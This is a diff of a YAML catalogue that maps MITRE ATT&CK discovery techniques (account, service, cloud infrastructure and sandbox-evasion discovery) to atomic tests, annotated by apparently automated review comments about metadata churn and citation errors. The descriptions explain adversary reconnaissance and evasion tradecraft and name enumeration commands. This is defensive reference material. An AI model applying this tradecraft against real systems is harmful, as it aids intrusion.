+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
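Review bot: the `-`/`+` pair inside the T1087.002 description (`utility, dscacheutil -q group` / `on macOS, and ldapsearch`) is identical as displayed, so the change is whitespace-only or lives in markup that does not render here; either way it is a no-op for readers. Confirm it is an intentional normalization (for example trailing whitespace) rather than editor churn, since the `modified` bump for this object (2024-04-15 to 2024-05-31) appears to be the only other change in the hunk.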
@@ -50161,7 +50868,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -50228,12 +50934,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -50323,18 +51028,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
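Review bot: the Deloitte "Environment Awareness" reference changes from the bare Drive link to the `/edit` form of the same file id, with the retrieval date updated to September 13, 2024; before merging, open the new URL in a session with no Google account to confirm the `/edit` path still serves the document to anonymous readers rather than prompting for access, since the bare `file/d/<id>` form was the share link. Updating the retrieval date is the right move if the link was actually re-checked; if it was not, keep the original date.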
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -50377,12 +51081,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -50423,12 +51126,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -50513,7 +51215,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -50575,12 +51276,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -50631,12 +51331,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -50647,7 +51346,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -50662,7 +51360,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -50710,7 +51407,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests:
- name: Azure Security Scan with SkyArk
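Review bot: for T1082 the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` keys are removed from the top and middle of the object (two hunks above) and re-added here at the bottom, the opposite of what the T1556 hunks do, where the same keys move from the bottom to the top. The serializer is clearly not emitting keys in a canonical order, which is why most of this diff is positional churn rather than substantive change; sorting keys on output, or preserving upstream order consistently, would shrink future diffs to the real edits and make regressions like the dropped `spec_version` easier to spot.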
@@ -50845,12 +51543,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -50892,122 +51589,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
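Review bot: the corrected line `+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList` restores the missing space before the cmdlet name, but `description: |-` is a literal block, so the hard line break before `PowerShell cmdlet can be used to obtain ...` is preserved in the resulting string and the rendered sentence still breaks mid-phrase; the T1580 description further down has the same pattern around `DescribeInstances`, `ListBuckets`, `HeadBucket`, `GetPublicAccessBlock`, `gcloud compute instances list`, `az vm list` and `DescribeDBInstances`. If these breaks come from inline code markup being stripped when the upstream text is imported, join the split lines (e.g. `the Get-GlobalAddressList PowerShell cmdlet can be used ...`) rather than leaving the newline in the data. Also worth a line in the changelog: with the spec bump to 3.2.0, `x_mitre_permissions_required` (`User`) is dropped from T1087.003 with no replacement, and its platforms collapse from `Office 365` / `Google Workspace` to `Office Suite`.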
@@ -51022,6 +51670,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -51031,9 +51685,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -51043,102 +51702,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
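Review bot: the `Microsoft AZ CLI` reference that this hunk re-orders (`description: Microsoft. (n.d.). az ad user.`, `url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest`) is cited in the T1580 description for `az vm list`, which lists virtual machines, not directory users, so the citation does not support the sentence it is attached to; since the text is only being moved here, this is the moment to fix it upstream or point the reference at the `az vm list` documentation. Two smaller defects in the same moved text: `(Citation: Mandiant M-Trends 2020)An adversary` is missing a space after the citation, and `Adversaries have also may use infrastructure discovery APIs` should read `Adversaries may also use infrastructure discovery APIs`.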
@@ -51192,7 +51886,6 @@ discovery:
